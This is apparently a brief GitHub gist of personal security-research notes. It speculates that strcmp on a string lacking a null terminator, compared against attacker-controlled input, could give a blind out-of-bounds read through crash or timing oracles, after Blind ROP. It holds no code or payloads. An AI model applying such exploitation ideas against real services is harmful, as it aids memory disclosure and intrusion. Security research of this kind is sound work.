Created
April 3, 2025 14:11
-
-
Save wh1t3h47/265377d8e5866120ceb74b936dda1c7c to your computer and use it in GitHub Desktop.
C Hacking Note
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Strcmp: Compare strings. | |
| Strcmp is used to compare strings, and therefore don't have buffer overflow write. | |
| However, if the first argument string is somehow not null terminated, and the | |
| second string is an attacker controlled one and I have some indicator of this | |
| comparison matching or not (I.e. Crashing and service restarts), I could | |
| theoretically have an arbitrary out-of-bounds read. | |
| It's a complicated attack that would require to bruteforce the memory until it matches, | |
| timing information could be used to further aid into the exploitation with the right | |
| statistical analysis. This idea is derived from Bittau's Blind ROP work. | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment